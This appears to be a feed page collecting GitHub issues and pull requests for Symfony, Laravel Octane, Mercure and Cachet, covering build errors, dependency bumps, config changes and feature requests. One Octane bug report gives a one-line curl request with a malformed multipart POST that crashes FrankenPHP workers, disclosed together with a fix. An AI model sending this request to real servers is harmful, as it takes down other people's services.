 ERROR  Failed to compile with 12 errors                                                                                                                

Module build failed: Module not found:
"./node_modules/@symfony/stimulus-bridge/lazy-controller-loader.js!./assets/controllers/hello_controller.js" contains a reference to the file "core-js/modules/es.object.set-prototype-of.js".
This file can not be found, please check it for typos or update it if the file got moved.

"./node_modules/@symfony/stimulus-bridge/lazy-controller-loader.js!./assets/controllers/hello_controller.js" contains a reference to the file "core-js/modules/es.object.get-prototype-of.js".
This file can not be found, please check it for typos or update it if the file got moved.

"./node_modules/@symfony/stimulus-bridge/lazy-controller-loader.js!./assets/controllers/hello_controller.js" contains a reference to the file "core-js/modules/es.reflect.construct.js".
This file can not be found, please check it for typos or update it if the file got moved.

"./node_modules/@symfony/stimulus-bridge/lazy-controller-loader.js!./assets/controllers/hello_controller.js" contains a reference to the file "core-js/modules/es.object.create.js".
This file can not be found, please check it for typos or update it if the file got moved.

"./node_modules/@symfony/stimulus-bridge/lazy-controller-loader.js!./assets/controllers/hello_controller.js" contains a reference to the file "core-js/modules/es.object.define-property.js".
This file can not be found, please check it for typos or update it if the file got moved.

"./node_modules/@symfony/stimulus-bridge/lazy-controller-loader.js!./assets/controllers/hello_controller.js" contains a reference to the file "core-js/modules/es.symbol.js".
This file can not be found, please check it for typos or update it if the file got moved.

"./node_modules/@symfony/stimulus-bridge/lazy-controller-loader.js!./assets/controllers/hello_controller.js" contains a reference to the file "core-js/modules/es.symbol.description.js".
This file can not be found, please check it for typos or update it if the file got moved.

"./node_modules/@symfony/stimulus-bridge/lazy-controller-loader.js!./assets/controllers/hello_controller.js" contains a reference to the file "core-js/modules/es.object.to-string.js".
This file can not be found, please check it for typos or update it if the file got moved.

"./node_modules/@symfony/stimulus-bridge/lazy-controller-loader.js!./assets/controllers/hello_controller.js" contains a reference to the file "core-js/modules/es.symbol.iterator.js".
This file can not be found, please check it for typos or update it if the file got moved.

"./node_modules/@symfony/stimulus-bridge/lazy-controller-loader.js!./assets/controllers/hello_controller.js" contains a reference to the file "core-js/modules/es.array.iterator.js".
This file can not be found, please check it for typos or update it if the file got moved.

"./node_modules/@symfony/stimulus-bridge/lazy-controller-loader.js!./assets/controllers/hello_controller.js" contains a reference to the file "core-js/modules/es.string.iterator.js".
This file can not be found, please check it for typos or update it if the file got moved.

"./node_modules/@symfony/stimulus-bridge/lazy-controller-loader.js!./assets/controllers/hello_controller.js" contains a reference to the file "core-js/modules/web.dom-collections.iterator.js".
This file can not be found, please check it for typos or update it if the file got moved.

I only have the file:

assets/controllers/hello_controller.js

import { Controller } from 'stimulus';

/*
 * This is an example Stimulus controller!
 *
 * Any element with a data-controller="hello" attribute will cause
 * this controller to be executed. The name "hello" comes from the filename:
 * hello_controller.js -> "hello"
 *
 * Delete this file or adapt it for your use!
 */
export default class extends Controller {
    connect() {
        this.element.textContent = 'Hello Stimulus! Edit me in assets/controllers/hello_controller.js';
    }
}

I have to comment all the export default for solve the encore problems.

View more
9 comments 👍 3
shakaran

shakaran

17th Aug 2021 @ 16:39

Problem

migrate:fresh (and the underlying db:wipe) only drops tables from the connection passed via --database (or the app's default connection). However, an individual migration may target a different connection via its $connection property (or Schema::connection('...') inside up()), and that connection's tables are never wiped by migrate:fresh.

This means that on a second migrate:fresh run, migrations for that other connection can fail (e.g. "table already exists"), or leave stale data behind - migrate:fresh no longer guarantees a truly fresh state, only for the connection you happened to pass to --database.

Fixes https://github.com/laravel/framework/issues/55194

Solution

  • Added Migrator::getConnectionsForMigrations(array $paths): array, which inspects the connection declared on each pending migration ($migration->getConnection()), falling back to the default connection for migrations that don't override it.
  • FreshCommand::handle() now wipes every connection returned by that method. The connection passed via --database (or the app default) is still wiped as a fallback when no pending migrations declare a connection, so commands with no migration files at all keep working as before.
  • migrate is still invoked exactly once, unchanged - it already resolves each migration's own connection correctly; only the wipe step was missing coverage.

Behavior change / backward compatibility

If a migration declares a $connection different from the one passed to --database, migrate:fresh will now also wipe that connection. Previously it silently left it untouched. This is a behavior change for anyone relying on the old (arguably buggy) behavior of leaving other connections alone - happy to gate this behind a flag (e.g. --single-database) if maintainers prefer opt-in instead of default-on.

Tests

  • DatabaseMigratorTwoConnectionsTest - verifies a migration whose $connection differs from the one passed to usingConnection() is still correctly run against its own connection (unchanged, legitimate behavior).
  • DatabaseMigrationFreshCommandMultiConnectionTest - verifies migrate:fresh calls db:wipe once per connection used by pending migrations, and migrate exactly once.
View more
emilversiontwo

emilversiontwo

13th Jul 2026 @ 19:47

Status: Needs Review Feature Toolkit
View more
seb-jean

seb-jean

25th May 2026 @ 17:46

What

Adds an http_client config option to each hub:

mercure:
    hubs:
        default:
            url: '%env(MERCURE_URL)%'
            jwt:
                secret: '%env(MERCURE_JWT_SECRET)%'
                publish: '*'
            http_client: 'mercure.http_client'

The referenced service is used by the Hub and Publisher instead of the global http_client. When omitted, the existing default (http_client) is preserved — no behavior change for current users.

Why

Hub::publish() is synchronous and blocks on the HTTP call until response. Without an explicit timeout, the Symfony HttpClient inherits default_socket_timeout (60s in default PHP).

When the hub becomes unreachable (TCP kernel-lock during a hardware/network incident, no RST/ACK), every publish() call hangs up to 60s before the exception is thrown. Even with a try/catch around the call, this exhausts PHP-FPM workers in seconds and cascades 504 timeouts on unrelated endpoints that don't even use Mercure.

This was exactly the failure mode discussed in #23. The maintainer suggested "using try/catch and tweaking the timeout via Symfony HttpClient" but the bundle currently provides no way to inject a custom client — the global http_client is hard-coded in MercureExtension. Users have to either:

  • Override mercure.hub.<name> in services.yaml (fragile: hard-codes internal service IDs and the constructor argument list),
  • Write a CompilerPass (boilerplate),
  • Move all publishes through Messenger (mitigates user-facing impact but workers still suffer the 60s hang).

With this PR, defense in depth becomes trivial:

framework:
    http_client:
        scoped_clients:
            mercure.http_client:
                base_uri: '%env(MERCURE_URL)%'
                timeout: 2
                max_duration: 3

Implementation

  • Configuration.php: new optional http_client scalar node.
  • MercureExtension.php: replace new Reference('http_client', ...) with new Reference($hub['http_client'] ?? 'http_client', ...) in both the Hub and Publisher registrations.
  • Two unit tests in MercureExtensionTest:
    • testExtensionWithCustomHttpClient — asserts the configured service ID is wired into both Hub and Publisher.
    • testExtensionDefaultsToGlobalHttpClient — asserts the default behavior is preserved when the option is omitted.

Backward compatibility

✅ Fully backward compatible. The new node is optional and defaults to 'http_client' (the previously-hard-coded value).

Tests

PHPUnit 9.6.34
Testing Symfony\Bundle\MercureBundle\Tests\DependencyInjection\MercureExtensionTest
......                                                              6 / 6 (100%)
OK (6 tests, 87 assertions)

Closes #23.

View more
1 comment
Renrhaf

Renrhaf

29th Apr 2026 @ 15:38

View more
nicolas-grekas

nicolas-grekas

4th Jun 2026 @ 12:44

Octane Version

2.17.4

Laravel Version

13.14.0

PHP Version

8.4.23

What server type are you using?

FrankenPHP

Server Version

FrankenPHP 1.12.4 (Caddy 2.11.4), worker mode

Database Driver & Version

Not relevant

Description

A POST request with Content-Type: multipart/form-data but no boundary parameter (and a non-empty body) kills the entire FrankenPHP worker.

PHP's POST parsing raises the warning frankenphp_handle_request(): Missing boundary in multipart/form-data POST data. In worker mode this warning surfaces at the frankenphp_handle_request() call in bin/frankenphp-worker.php:72 -- that is, in the worker loop itself, outside the per-request try/catch inside the $handleRequest closure.

Laravel's HandleExceptions bootstrapper promotes the warning to an ErrorException, which is thrown at the loop level, is never caught, and terminates the worker with a fatal error:

FatalError: Uncaught ErrorException: frankenphp_handle_request(): Missing boundary in multipart/form-data POST data in vendor/laravel/octane/bin/frankenphp-worker.php:72
Stack trace:
#0 vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/HandleExceptions.php(262): Illuminate\Foundation\Bootstrap\HandleExceptions->handleError()
#1 [internal function]: Illuminate\Foundation\Bootstrap\HandleExceptions->{closure:Illuminate\Foundation\Bootstrap\HandleExceptions::forwardsTo():261}()
#2 vendor/laravel/octane/bin/frankenphp-worker.php(72): frankenphp_handle_request()
#3 public/frankenphp-worker.php(7): require('...')
#4 {main}

The damage does not stop at the worker restart. Because the fatal fires between requests, HandleExceptions::handleShutdown() then tries to report and render it against inter-request container state, and both fail with BindingResolutionException: Target class [config] does not exist (report via Handler::report, render via the error view). The rendered error page also carries the superglobals of the previous request, so the resulting error-tracker events point at unrelated URLs (health checks, static assets), which makes this quite hard to trace in production.

Any client can trigger this with a single malformed request -- in our production this fires several times per day from broken clients and bot traffic, killing a worker each time.

Steps To Reproduce

Against any Octane + FrankenPHP app in worker mode:

curl -X POST -H 'Content-Type: multipart/form-data' -d 'x' https://your-app.test/

The worker dies with the fatal above and FrankenPHP respawns it.

Minimal standalone reproduction (no Laravel, just the same error-handler behavior as HandleExceptions):

<?php

// worker.php -- mimics Laravel's HandleExceptions: promote warnings to exceptions
set_error_handler(function (int $level, string $message, string $file = '', int $line = 0) {
    if (error_reporting() & $level) {
        throw new ErrorException($message, 0, $level, $file, $line);
    }
});

$handler = static function () {
    try {
        echo 'ok';
    } catch (Throwable $e) {
        // per-request guard, like Octane's frankenphp-worker.php -- never reached
        http_response_code(500);
    }
};

while (frankenphp_handle_request($handler)) {
}
curl -X POST -H 'Content-Type: multipart/form-data' -d 'x' localhost:8099/worker.php

Result: Fatal error: Uncaught ErrorException: frankenphp_handle_request(): Missing boundary in multipart/form-data POST data thrown at the while line; the try/catch inside the handler never sees it.

Possible fix

Suppressing diagnostics on the call keeps the warning out of the promoted-exception path while leaving the request handling intact:

while ($requestCount < $maxRequests && @frankenphp_handle_request($handleRequest)) {

Verified with the reproduction above: with @, the malformed request is served normally (the app simply sees an empty POST array, the same behavior as php-fpm) and the worker survives. Happy to send a PR if that approach is acceptable.

View more
stubbedev

stubbedev

14th Jul 2026 @ 09:24

filament

Webhooks need to include additional data. For example, incidents should include a list of affected components.

This is easily doable within the API (since we can refactor the action to dispatch the event) but creating incidents via the dashboard will prematurely fire the IncidentCreated event before the incident components are attached.

View more
jbrooksuk

jbrooksuk

11th May 2025 @ 20:54

There is a check in constructor of Symfony\Component\Security\Acl\Domain: if ($role instanceof Role) { $role = $role->getRole(); } I think it is better to check on Symfony\Component\Security\Core\Role\RoleInterface instead of Symfony\Component\Security\Core\Role\Role class Pull request: https://github.com/symfony/security-acl/pull/17

View more
1 comment
Redigast13

Redigast13

17th Jan 2016 @ 08:34

dependencies

Bumps actions/cache from 5 to 6.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

29th Jun 2026 @ 14:02

The Invokable command feature is landing in Symfony 7.3, this is improving the DX with the resolution of the callable parameters. For new applications, the maker should generate the command class using this new syntax.

Currently, MakeCommand generates the command class from its name only. We can make the command more interactive and ask for the parameter and options, to generate the full command definition: the signature of the __invoke method with #[Argument] and #[Option] attributes).

@tacman wrote an implementation that is presented in this article: Generating Symfony 7.3 Console Commands

View more
👍 4
GromNaN

GromNaN

6th May 2025 @ 11:46

When using PhpStorm v2024.*, running certain Symfony Flex recipe updates (e.g., composer recipes:update doctrine/doctrine-bundle) causes conflict resolution to fail. The following error is displayed in PhpStorm:

Error loading revisions to merge: cannot read object [Hash] '[File path]'

A bug report has already been submitted to the JetBrains issue tracker (IJPL-158448). However according to JetBrains staff, the error is triggered by a missing blob, potentially linked to the Symfony recipe repository or the update process itself.

I haven't investigated Symfony Flex internals or debugged the issue deeply, so I cannot determine whether this is a problem with Symfony Flex's handling of files during recipe updates or a bug in PhpStorm.

Steps to Reproduce (also refer to the jetbrains ticket for repro):

  • Use PhpStorm v2024.* with a Symfony project.
  • Run composer recipes:update doctrine/doctrine-bundle (or a similar recipe update).
  • Attempt to resolve conflicts through PhpStorm.
  • Observe the error: Error loading revisions to merge.

Expected Behavior: Conflict resolution should work seamlessly after recipe updates without errors.

Actual Behavior: Conflict resolution fails, displaying an error about being unable to read an object or file.

View more
5 comments 👍 2
Tib-z

Tib-z

20th Nov 2024 @ 12:41

more information needed

How to migrate from cachet 2.x to 3.x without losing status page data currently?

According to the docs.cachethq.io documentation, the php artisan migrate command presents an error.

View more
6 comments
TecSecret

TecSecret

9th Dec 2024 @ 12:38

Integration and settings section greyed out

View more
nikitas-18

nikitas-18

6th Mar 2026 @ 09:17

The package.json file of the symfony/webpack-encore-bundle contains the regenerator-runtime package. Our abandoned package checker picked up on this. For good reason it seems, as the GitHub repo is marked as archived and the last release was 2 years ago. What is the purpose of this package in the context of the webpack encore bundle? The package was added when I updated the recipe (from version 2.0 to 2.1 if I'm interpreting the symfony.lock correctly), it wasn't installed before (it must have been removed manually as it is present in the 2.0 version of the recipe), and my encore builds worked fine then.

View more
2 comments
leonboot

leonboot

29th May 2026 @ 07:33

bug

What happened?

I attempted to install the ylsideas/cockroachdb-laravel package in my Laravel project, but the installation failed due to a version conflict with illuminate/contracts. The error message indicates that the required version of illuminate/contracts (ranging from 8.x to 11.x) conflicts with another dependency in the project.

How to reproduce the bug

  1. Create a Laravel project (or use an existing one).
  2. Run the following command to install the ylsideas/cockroachdb-laravel package:
    composer require ylsideas/cockroachdb-laravel```
    
  3. The installation will fail due to a version conflict with illuminate/contracts.

Package Version

1.4.0

PHP Version

8.2.12

Laravel Version

12.33.0

CockroachDB Version

25.2.6

Which operating systems does with happen with?

Windows

Notes

No response

View more
👍 1
arsallanShahab

arsallanShahab

9th Oct 2025 @ 22:45

I have a requirement for multi-tenancy. A public status page for the base application. Then, multi-tenancy status pages showing the status of individual projects per customer for a SaaS application hosting solution. The preference is for Auth0 integration for auth, providing access to the individual private status pages. Is this something considered on the roadmap, and if not, I'm happy to hear any tips on architecture if I decide to proceed with a fork for create this functionality.

View more
👍 2
kurtfoster

kurtfoster

23rd Feb 2025 @ 01:57

Modernise things a little

View more
ziming

ziming

26th Mar 2026 @ 15:47

dependencies github_actions

Bumps actions/checkout from 6 to 7.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

1st Jul 2026 @ 23:46

Hi,

When I launch the command npm run build, I get the following error:

`[xxx@serveur tag]$ /home/xxx/nodevenv/public_html/xxx/16/bin/npm run build

build encore production --progress

Running webpack ...

99% done plugins FriendlyErrorsWebpackPlugin ERROR Failed to compile with 1 errors 12:44:04

error in ./assets/controllers.json 12:44:04

Module build failed (from ../../nodevenv/public_html/xxx/16/lib/node_modules/@symfony/stimulus-bridge/dist/webpack/loader.js): Error: The file "@symfony/ux-chartjs/package.json" could not be found. Try running "yarn install --force". at createControllersModule (/home/xxx/nodevenv/public_html/xxx/16/lib/node_modules/@symfony/stimulus-bridge/dist/webpack/loader.js:46:19) at Object.loader (/home/xxx/nodevenv/public_html/xxx/16/lib/node_modules/@symfony/stimulus-bridge/dist/webpack/loader.js:106:43)

Entrypoint app = runtime.9a71ee5d.js 842.cb9a3ca0.js app.97de1fbb.css app.0095513b.js 7 auxiliary assets webpack compiled with 1 error`

Indeed, I don't have the package.json file in the directory ux-chartjs.

Here is my package.json:

{ "devDependencies": { "@hotwired/stimulus": "^3.0.0", "@popperjs/core": "^2.11.0", "@symfony/stimulus-bridge": "^3.2.0", "@symfony/stimulus-bundle": "file:vendor/symfony/stimulus-bundle/assets", "@symfony/ux-chartjs": "file:vendor/symfony/ux-chartjs/assets", "@symfony/webpack-encore": "^1.7.0", "bootstrap": "^5.1.3", "chart.js": "^3.4.1", "core-js": "^3.20.0", "jquery": "^3.6.0", "regenerator-runtime": "^0.13.2", "sass": "^1.45.0", "sass-loader": "^12.4.0", "webpack-notifier": "^1.15.0" }, "license": "UNLICENSED", "private": true, "scripts": { "dev-server": "encore dev-server", "dev": "encore dev", "watch": "encore dev --watch", "build": "encore production --progress" }, "dependencies": { "@babel/plugin-proposal-class-properties": "^7.18.6" } }

Thank you,

Clara.

View more
2 comments
Dumorya

Dumorya

15th Jan 2024 @ 11:48

My r2e run is whining:

2023-11-07 15:15:02,882 [WARNING] looks like HTML: Incidents-du-réseau-Framasoft (https://status.framasoft.org/atom -> [email protected])
2023-11-07 15:15:02,883 [WARNING] non XML Content-Type: text/html; charset=UTF-8 is not an XML media type: Incidents-du-réseau-Framasoft (https://status.framasoft.org/atom -> [email protected])

Looks like it's just because cachet sends an HTTP Content-Type with text/html instead of telling it's XML.

View more
2 comments
JulienPalard

JulienPalard

7th Nov 2023 @ 14:44

dependencies github_actions

Bumps actions/cache from 5 to 6.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

29th Jun 2026 @ 04:52

more information needed

Hi there,

Installation guide: https://docs.cachethq.io/v3.x/installation

Step 9: php artisan cachet:make:user

Even when one is selecting is_admin (*), then the created user is not an admin is_admin = 0. Had to fix this manually in the db, guess this is a bug.

Thanks!

View more
3 comments
hofchr

hofchr

24th Apr 2025 @ 13:54

Hi, When I generate a Symfony application with the following command: symfony new my-project --php=8.2 --webapp --docker --cloud, .env.dev file is not empty. The contents are as follows:

###> symfony/framework-bundle ###
APP_SECRET=66ebd8189db56157e5a052eea7c86f38
###< symfony/framework-bundle ###

Is it normal for the .env.dev file of the Symfony Demo Application to be empty?

View more
seb-jean

seb-jean

30th Jul 2025 @ 15:04

help wanted

Laravel Version

13.11.2

PHP Version

8.5.4

Database Driver & Version

No response

Description

On Windows 11, running laravel new fails during the post-autoload scripts when artisan install:features is executed. The command triggers an interactive prompt, which causes the Composer script to fail with exit code 255.

> Illuminate\Foundation\ComposerScripts::postAutoloadDump
> @php artisan package:discover --ansi

   INFO  Discovering packages.

  inertiajs/inertia-laravel ................................................................................................................... DONE
  laravel/fortify ............................................................................................................................. DONE
  laravel/pail ................................................................................................................................ DONE
  laravel/pao ................................................................................................................................. DONE
  laravel/passkeys ............................................................................................................................ DONE
  laravel/sail ................................................................................................................................ DONE
  laravel/tinker .............................................................................................................................. DONE
  laravel/wayfinder ........................................................................................................................... DONE
  nesbot/carbon ............................................................................................................................... DONE
  nunomaduro/collision ........................................................................................................................ DONE
  nunomaduro/termwind ......................................................................................................................... DONE

87 packages you are using are looking for funding.
Use the `composer fund` command to find out more!
> @php artisan install:features --ansi

  Which authentication features would you like to enable? [email-verification,registration,2fa,passkeys,password-confirmation]
  None .............................................................................................................................................
  Email verification ............................................................................................................ email-verification
  Registration ........................................................................................................................ registration
  Two-factor authentication .................................................................................................................... 2fa
  Passkeys ................................................................................................................................ passkeys
  Password confirmation ...................................................................................................... password-confirmation

Script @php artisan install:features --ansi handling the post-update-cmd event returned with error code 255

Steps To Reproduce

laravel new

Observe failure during post-autoload-dump

View more
4 comments
Ademking

Ademking

24th May 2026 @ 01:50

For a type: symfony-bundle package without a recipe, Flex auto-registers it in config/bundles.php only if the concrete class file literally contains Symfony\Component\HttpKernel\Bundle\Bundle or ...\AbstractBundle — a raw str_contains() on the file bytes, no autoloading or reflection:

https://github.com/symfony/flex/blob/v2.11.0/src/SymfonyBundle.php#L109-L113

So a bundle extending an intermediate base (e.g. class MyBundle extends AbstractMyVendorBundle, where the vendor base extends AbstractBundle) has neither literal in its own file and is silently skipped — composer req installs it but never updates config/bundles.php. The check also doesn't match the Symfony 8 base Symfony\Component\DependencyInjection\Kernel\AbstractBundle.

I'd argue type: symfony-bundle should be enough on its own. Options for a PR:

  1. Reflection — at install time the class is autoloadable, so check is_subclass_of($class, BundleInterface::class). Robust against intermediate bases and namespace moves.
  2. Remove the heuristic — trust the symfony-bundle type.
  3. Fail loudly — if the package's class doesn't resolve to a BundleInterface, throw rather than silently skipping.

Happy to make a PR.

View more
4 comments
tacman

tacman

17th Jun 2026 @ 09:16

An experiment: convert the entire test suite from Pest to Pure, a PHP testing framework that is not built on PHPUnit, and measure whether the tests run faster.

What's here

All 164 tests (162 passing, 2 skipped) mirrored under tests/Pure/, the same result as the Pest suite. The test bodies are unchanged: HTTP tests still call get('/archive')->assertOk(), tests still use $this->, Mockery, facade fakes, assertDatabaseHas, higher-order expectations, and so on. Only the imports differ (use function Pure\...). Shared setup lives in pure.php at the root.

The originals under tests/Feature and tests/Unit are untouched; this only adds files.

How it works

Pure drives discovery, scheduling, parallelism and reporting. Each test's $this is bound to a real Laravel TestCase (with RefreshDatabase), so every Laravel testing affordance keeps working unchanged. Workers are forked from a warm parent, and each parallel worker gets its own database (freekdev_test_test_{n}).

Are the tests faster?

Yes. Full suite, 164 tests, best of 3, wall clock:

Pest Pure speedup
serial 7.25 s 5.76 s ~1.3x
parallel 3.92 s 1.86 s ~2.1x

Pure runs the whole suite in 1.86s. The parallel win comes from forking workers from a warm parent process; Pest (via ParaTest) spawns fresh PHP processes that each re-bootstrap Laravel.

How to run

php /path/to/pure/bin/pure

No flags needed (workers default to the CPU count). See tests/Pure/README.md.

Caveats

  • Both run on MySQL with RefreshDatabase (migrate once per worker, transaction per test), so this compares the runners on equal database footing.
  • The shared beforeEach in pure.php omits the ray()->newScreen() debug call from Pest.php.
  • Pure is an experiment; the binary lives outside this repo.
View more
freekmurze

freekmurze

16th Jun 2026 @ 22:30

docker logs cachet Initializing Cachet container ... sed: can't create temp file '/var/www/html/.envXXXXXX': Permission denied

View more
bookmarkies

bookmarkies

17th May 2021 @ 10:37

dependencies github_actions

Bumps stefanzweifel/git-auto-commit-action from 5.2.0 to 7.2.0.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

29th Jun 2026 @ 07:13

Bug AI Bundle Status: Needs Review
Q A
Bug fix? yes
New feature? no
Docs? no
Issues -
License MIT

Problem

TemplateRendererListener accepts an optional NormalizerInterface as its second argument and uses it to normalize object template variables, honoring template_options['normalizer_context'] (e.g. serializer groups):

if (\is_object($value) && !$value instanceof \Stringable) {
    if (null === $this->normalizer) {
        throw new InvalidArgumentException(\sprintf('Template variable "%s" is an object but no normalizer is configured. ...', $key));
    }

    $normalized[$key] = $this->normalizer->normalize($value, null, $normalizerContext);
}

The bundle registers the listener with only the renderer registry:

->set('ai.platform.template_renderer_listener', TemplateRendererListener::class)
    ->args([
        service('ai.platform.template_renderer_registry'),
    ])
    ->tag('kernel.event_subscriber')

so $normalizer is always null. Passing an object as a template variable therefore throws, and the entire object-normalization feature — together with template_options['normalizer_context'] — is unreachable in a Symfony application. Only scalar template vars work today.

Solution

Wire the serializer service as the second argument (nullOnInvalid(), since the argument is optional and the serializer may not be installed).

This makes objects usable as template variables, with the normalizer context applied:

$platform->invoke($model, $messages, [
    'template_vars' => ['star' => $star],
    'template_options' => ['normalizer_context' => ['groups' => ['prompt']]],
]);

Combined with StringTemplateRenderer's array flattening, the normalized object is addressable with dotted placeholders — {star.name}, {star.yearOfBirth} — and serializer groups control exactly which fields reach the prompt.

BC

None. The argument was already optional; this only supplies it. Behavior for scalar template vars is unchanged.

Tests

AiBundleTest::testTemplateRendererListenerReceivesNormalizer() asserts the listener is registered with both arguments and still tagged kernel.event_subscriber.

Full src/ai-bundle suite is green (404 tests) and PHPStan reports no errors.

View more
chr-hertel

chr-hertel

14th Jul 2026 @ 12:40

Summary

  • Split the single jwt config node into separate publisher and subscriber sections, aligning the bundle config with the upstream Hub class which already models these as two distinct concerns (TokenProviderInterface for
    publishing, TokenFactoryInterface for subscriber cookies)
  • The legacy jwt / jwt_provider config is automatically normalized into the new format via beforeNormalization, so no existing config breaks
  • When publisher and subscriber share identical secret/algorithm/passphrase, a single LcobucciFactory is registered (backward-compatible service IDs preserved)

New config API

mercure:
  hubs:
    default:
      url: https://demo.mercure.rocks/hub

      publisher:                            # → TokenProviderInterface
        # Option A: static token
        value: "eyJhbG..."
        # Option B: custom service
        provider: app.my_token_provider
        # Option C: factory (wraps as FactoryTokenProvider)
        factory: app.my_token_factory
        # Option D: auto-generated LcobucciFactory
        secret: "publisher-key"
        algorithm: hmac.sha256              # default
        passphrase: ""                      # default
        topics: ['*']                       # → mercure.publish JWT claim

      subscriber:                           # → TokenFactoryInterface
        # Option A: custom service
        factory: app.my_token_factory
        # Option B: auto-generated LcobucciFactory
        secret: "subscriber-key"
        algorithm: hmac.sha256              # default
        passphrase: ""                      # default
        topics: ['https://example.com/{id}'] # → mercure.subscribe JWT claim

Minimal example (separate keys)

mercure:
  hubs:
    default:
      url: https://hub.example.com/.well-known/mercure
      publisher:
        secret: "%env(MERCURE_PUBLISHER_KEY)%"
        topics: ['*']
      subscriber:
        secret: "%env(MERCURE_SUBSCRIBER_KEY)%"

Minimal example (static JWT, no subscriber)

mercure:
  hubs:
    default:
      url: https://hub.example.com/.well-known/mercure
      publisher:
        value: "%env(MERCURE_JWT)%"

Legacy config (still works, deprecated in 0.5)

mercure:
  hubs:
    default:
      url: https://hub.example.com/.well-known/mercure
      jwt:
        secret: "!ChangeMe!"
        publish: ['*']
        subscribe: ['https://example.com/book/{id}']

This is automatically normalized to:

publisher:
  secret: "!ChangeMe!"
  algorithm: hmac.sha256
  topics: ['*']
subscriber:
  secret: "!ChangeMe!"
  algorithm: hmac.sha256
  topics: ['https://example.com/book/{id}']
View more
guillaume-sainthillier

guillaume-sainthillier

11th Feb 2026 @ 15:38

good first issue

I would love to see support for oAuth in Catchet. I know there are some other (closed) issues requesting the same functionality, but I think this would be a great addition for Catchet.

View more
4 comments 👍 1
FoksVHox

FoksVHox

28th Feb 2025 @ 08:29

Q A
Issues Companion to symfony/ux#3473
License MIT

Companion PR to symfony/ux#3473. Adds the Toolkit/Shadcn docs page for the sheet recipe.

Kept as draft until symfony/ux#3473 (which introduces the upstream recipe) is merged.

Split out from the original #54 so each component can be reviewed/merged independently alongside its upstream recipe.

View more
Amoifr

Amoifr

18th Apr 2026 @ 14:21

This PR updates the FrankenPHP configuration to disable worker mode if the application is running in the local environment and the worker count is not specified explicitly (or set to auto).

The problem

FrankenPHP's Worker mode keeps the application in memory, which does wonders for performance when running in production. Locally, however, it causes problems with XDebug, and does not reflect file changes immediately. The solution to the latter is configuring Octane to restart the worker after every request, thereby defeating most of the advantages of an application server in the first place.

The solution

By only enabling worker mode if the application is running in a non-local environment, it will be served in a CGI-like manner, i.e. what the built-in PHP server (used in artisan serve) does—and exactly what you'd expect to happen: XDebug just works, and changes to files are reflected immediately.
In production, worker mode will be enabled and all the benefits that come with it apply. We use the setup as provided in this PR in our production application and don't face any issues with it.

This solves https://github.com/dunglas/frankenphp/issues/931, and probably solves #928 too.

View more
8 comments 👍 3
Radiergummi

Radiergummi

24th Jul 2024 @ 09:56

bug

What happened?

CockroachDB have enabled autocommit_before_ddl default to true as of V25, this results in transactions getting committed before they're told and results in PDO erroring with "No active transaction".

I'm not a CockroachDB expert and we're currently assessing whether we'll continue to use it or just use trusty old Postgres, for now I've made a workaround by configuring the session variable on the connection before a transaction by registering events in the AppServiceProvider.

private function setupCockroachDBPreventAutoCommitBeforeDDL(): void
{
    $configured = [];

    Event::listen(ConnectionEstablished::class, function (ConnectionEstablished $event) use (&$configured) {
        if ($event->connection->getDriverName() !== "crdb") {
            return;
        }

        $configured[$event->connectionName] = false;
    });

    Event::listen(TransactionBeginning::class, function (TransactionBeginning $event) use (&$configured) {
        if ($event->connection->getDriverName() !== "crdb" || ($configured[$event->connectionName] ?? false)) {
            return;
        }

        $event->connection->statement("SET SESSION autocommit_before_ddl = false");
        $configured[$event->connectionName] = true;
    });
}

How to reproduce the bug

  • Run CRDB with autocommit_before_ddl set to true
  • Attempt to run migrations or anything else that starts a transaction
  • "No active transaction error"

